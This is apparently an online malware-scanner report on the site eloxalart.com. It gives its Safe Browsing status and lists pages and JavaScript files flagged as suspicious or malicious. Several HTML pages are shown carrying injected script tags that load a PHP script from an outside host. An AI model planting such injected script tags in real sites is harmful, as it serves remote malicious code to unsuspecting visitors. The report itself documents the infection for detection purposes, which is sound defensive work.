Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=eloxalart.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://eloxalart.com/ | 200 OK Content-Length: 14180 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950331"></script> | ||
http://eloxalart.com/js/jquery.js | 200 OK Content-Length: 60327 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){if(window.jQuery)var _jQuery=window.jQuery;var jQuery=window.jQuery=function(selector,context){return new jQuery.prototype.init(selector,context);};if(window.$)var _$=window.$;window.$=jQuery;var quickExpr=/^[^<]*(<(.|\s) >)[^>]*$|^#(\w )$/;var isSimple=/^.[^:#\[\.]*$/;jQuery.fn=jQuery.prototype={init:function(selector,context){selector=selector||document;if(selector.nodeType){this[0]=selector;this.length=1;return this;}else if(typeof selector=="string"){var match=quickEx /*/a9a007*/) /*/339810*/ Antivirus reports:
| ||
http://eloxalart.com/js/DD_belatedPNG.js | 200 OK Content-Length: 18287 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DD_belatedPNG = { ns: 'DD_belatedPNG', imgSize: {}, delay: 10, nodesFixed: 0, createVmlNameSpace: function () { if (document.namespaces && !document.namespaces[this.ns]) { document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml'); } }, createVmlStyleSheet: function () { var screenStyleSheet, printStyleSheet; screenStyleSheet = document.createElement('style'); screenStyleSheet.setAttribute('media' 0*/ Antivirus reports:
| ||
http://eloxalart.com/js/jquery.lightbox-0.5.js | 200 OK Content-Length: 25846 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.lightBox = function(settings) { settings = jQuery.extend({ overlayBgColor: '#000', overlayOpacity: 0.8, fixedNavigation: false, imageLoading: 'images/lightbox-ico-loading.gif', imageBtnPrev: 'images/lightbox-btn-prev.gif', imageBtnNext: 'images/lightbox-btn-next.gif', imageBtnClose: 'images/lightbox-btn-close.gif', imageBlank: 'images/lightbox-blank.gif', containerBorderSize: 10, con Antivirus reports:
| ||
http://eloxalart.com/Scripts/AC_RunActiveContent.js | 200 OK Content-Length: 14286 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false; var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false; var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false; function ControlVersion() { var version; var axo; var e; try { axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7"); version = axo.GetVariable("$version"); } catch (e) { } if (!version) /339810*/339810*/ Antivirus reports:
| ||
http://eloxalart.com/images/atest.jpg | 200 OK Content-Length: 68659 Content-Type: image/jpeg | clean |
http://eloxalart.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://eloxalart.com/kontakt.html | 200 OK Content-Length: 8385 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950334"></script> | ||
http://eloxalart.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 27936 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, domLoadFnArr = [], regObjArr = [], timer = null, storedAltContent = null, storedAltContentId Antivirus reports:
| ||
http://eloxalart.com/index.html | 200 OK Content-Length: 14180 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950331"></script> | ||
http://eloxalart.com/nagrody.html | 200 OK Content-Length: 9865 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950355"></script> | ||
http://eloxalart.com/galeria.html | 200 OK Content-Length: 11913 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950326"></script> | ||
http://eloxalart.com/dystrybucja.html | 200 OK Content-Length: 10334 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950294"></script> | ||
http://eloxalart.com/montaz.html | 200 OK Content-Length: 11890 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950346"></script> | ||
http://eloxalart.com/mozliwosci.html | 200 OK Content-Length: 10880 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://anthony.giambalvo.net/xcn6qk3j.php?id=22950350"></script> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: eloxalart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:32:39 GMT
Accept-Ranges: bytes
ETag: "8ec1c18-3764-509787007f7de"
Server: Apache
Content-Length: 14180
Content-Type: text/html
Last-Modified: Fri, 05 Dec 2014 13:56:03 GMT
...14180 bytes of data.
GET / HTTP/1.1
Host: eloxalart.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 22:32:39 GMT
Accept-Ranges: bytes
ETag: "8ec1c18-3764-509787007f7de"
Server: Apache
Content-Length: 14180
Content-Type: text/html
Last-Modified: Fri, 05 Dec 2014 13:56:03 GMT
...14180 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: eloxalart.com
Referer: http://www.google.com/search?q=eloxalart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: eloxalart.com
Referer: http://www.google.com/search?q=eloxalart.com
Result:
The result is similar to the first query. There are no suspicious redirects found.